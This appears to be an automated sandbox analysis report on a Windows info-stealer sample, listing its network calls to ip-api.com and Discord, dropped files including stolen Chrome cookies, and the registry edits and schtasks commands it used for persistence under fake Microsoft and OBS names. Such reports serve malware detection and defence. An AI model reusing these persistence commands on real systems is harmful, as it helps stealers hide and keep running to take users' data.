US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.73.50.20.in-addr.arpa udp

Files

memory/2516-1-0x00007FFA13603000-0x00007FFA13605000-memory.dmp

memory/2516-0-0x00000000001F0000-0x0000000000248000-memory.dmp

memory/2228-2-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-3-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-4-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-8-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-14-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-13-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-12-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-11-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-10-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-9-0x000002AECE460000-0x000002AECE461000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/2516-74-0x000000001D030000-0x000000001D0A6000-memory.dmp

memory/2516-75-0x0000000002330000-0x000000000233C000-memory.dmp

memory/2516-76-0x0000000002580000-0x000000000259E000-memory.dmp

memory/2516-90-0x00007FFA13603000-0x00007FFA13605000-memory.dmp

memory/2516-92-0x000000001D1B0000-0x000000001D2F6000-memory.dmp

memory/2516-191-0x0000000002340000-0x000000000234A000-memory.dmp

memory/2200-194-0x0000027A7F260000-0x0000027A7F282000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ds0fpfk.msq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/2516-238-0x00000000009C0000-0x00000000009CC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe

MD5 a77ad875932600ec52af6a1ea7fc65ae
SHA1 f5ee833f1ab363e5dd70526dd618b92d86c77f80
SHA256 20c99e2aa0de86267ed7d713c90ab281fec37ec6fd10e624042b520ed8ca0ae3
SHA512 c1612cf79cd6557e92502ddb0c222e34c077169bb61be5c37c6c203fb3b0894cbf897dea59b246a54a02d53bb589d21a231060b70416f478ae2ac8ab1ef3759c

memory/4872-256-0x0000023621100000-0x0000023621140000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c5348f7d6ae5ae4f688df9f8481823d
SHA1 6ee5b8fcff32e3f790b30ca145c13375aa6dae0d
SHA256 092b25fe912599ec5c4457f26a7160ebfa98551abb663e5f96158ebaab13034b
SHA512 041122db23f35dfce15a5a330fde4612692bace13d1d30843690a0b1b604946e32191221527ba0115e471e2a15ada135765aa87d62d47b0d65a0da4edb71d9bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

memory/4872-288-0x000002363B830000-0x000002363B880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39c2ac09b52b0685c7da5b25746d8a64
SHA1 c0ac1559da69dc9ad0496c11ce37ef9b907ea656
SHA256 c582429e23c81918907db9c7f32bef2d32c873f2da84fa450707482408e3a160
SHA512 9a6f4c5944cecdd6cf2114f7db583e4742a93b3c9eec6fd60328585370a8ba2f917f7ce689c0341d2dbf391f58ff34ee0088d9d2158ebb2450c547257da095a1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1726a06b1e2471258cc0d0da880b0734
SHA1 e03d53ceff0137aa8932334571c6e2988b475d14
SHA256 4298c061a28200fcd3211c61842f4f39410158753938151756c19367eefc58be
SHA512 ff9c7a556993d23123845407eb1dc3c0586eac692a877aa784fb577ceb381fd4700fa0b397a9276aa1da633704769005425344ecf485bae4f0793c365509a92c

memory/4872-344-0x0000023622DF0000-0x0000023622DFA000-memory.dmp

memory/4872-345-0x000002363B930000-0x000002363B942000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ae85c1e4a8a5415e57b3ac516f2964bf
SHA1 8be3f0538f41d24afaf47c2a6c1764b954190e8a
SHA256 9fed6a56624cf895c26311a19f3c1a0a78c0b92c00ae626d8492f2bf418f269f
SHA512 b47558e9977ea42395ddba0d3eefcc4d8a0d6c0bd8e9639ecedc9ae10834f3ab2c91827ecd0deaa2c2341f9612655776cc3ad8a34f0f7f020d3efc24f00c2cd8

C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu.ligma

MD5 47a21e82f9b46d893d49273b4dc84a70
SHA1 2802fa59ca7df9024495dd471bc45a0767647bb7
SHA256 539a6d338b9671479edd07178032deade637bc2cd10b5a150da1b9787d3e6da9
SHA512 9238b641f6ecb7271edaa59d776f86bd0edbbb3ed574b5c86e28d9b2932f53609abac33bb5b5f0973e30d4750f8502ca0b09f6f909fe94488a1f909d6ea0de68

C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu\Display\Display.png

MD5 26355da9122dbf8403f7e0ab42d713fc
SHA1 ea3d02af9cebf68b0dd16ffc2548c67693aaf1ad
SHA256 69b75d9c5af2143eb39997618fa5fcef0f91506d197336db6a9e7fc557832617
SHA512 1b9fdb382285b251eefdf178f4ab10ff7d6199faf15e0082c47499329a45e85ffc7213e31c01d26a0b5bb656cf78fc26cc2cf7074aa631c465bbd7314913a7dc

C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu\Browsers\Cookies\Chrome Cookies.txt

MD5 2d66d955e6d676db89116d677757832f
SHA1 4376d860e74a7a3caaccdb68007d48c16b349e3c
SHA256 0acd7f6f1a4d35d224b253e5d59462e5d336dd022992b2acad2e81e18c61d954
SHA512 42266d0023cb054e5f18f4d06ff7e0900e611d0d6e0894b8d9e1fc67338d59ccd630a39fe568e80a280cb2f7b879a679dfa03838fcbe1d5ed5552a60e8d10d63

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x5drfucs.3zw.exe.log

MD5 547df619456b0e94d1b7663cf2f93ccb
SHA1 8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3
SHA256 8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a
SHA512 01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 14:34

Reported

2024-06-15 14:37

Platform

win11-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\xdwdMicrosoft Azure DevOps.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies AppInit DLL entries

persistence

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Local\\xdwdGreenshot.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2348 wrote to memory of 4280 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2348 wrote to memory of 4280 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3416 wrote to memory of 3720 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3416 wrote to memory of 3720 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4572 wrote to memory of 4792 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4572 wrote to memory of 4792 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4076 wrote to memory of 3692 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4076 wrote to memory of 3692 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4060 wrote to memory of 4260 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 4260 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2036 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2036 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2268 wrote to memory of 2416 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2268 wrote to memory of 2416 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1416 wrote to memory of 1580 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1416 wrote to memory of 1580 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3676 wrote to memory of 2916 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3676 wrote to memory of 2916 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3436 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3436 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4204 wrote to memory of 3348 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4204 wrote to memory of 3348 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1036 wrote to memory of 1584 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1036 wrote to memory of 1584 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3268 wrote to memory of 4464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3268 wrote to memory of 4464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1368 wrote to memory of 4004 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1368 wrote to memory of 4004 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1280 wrote to memory of 1108 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1280 wrote to memory of 1108 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

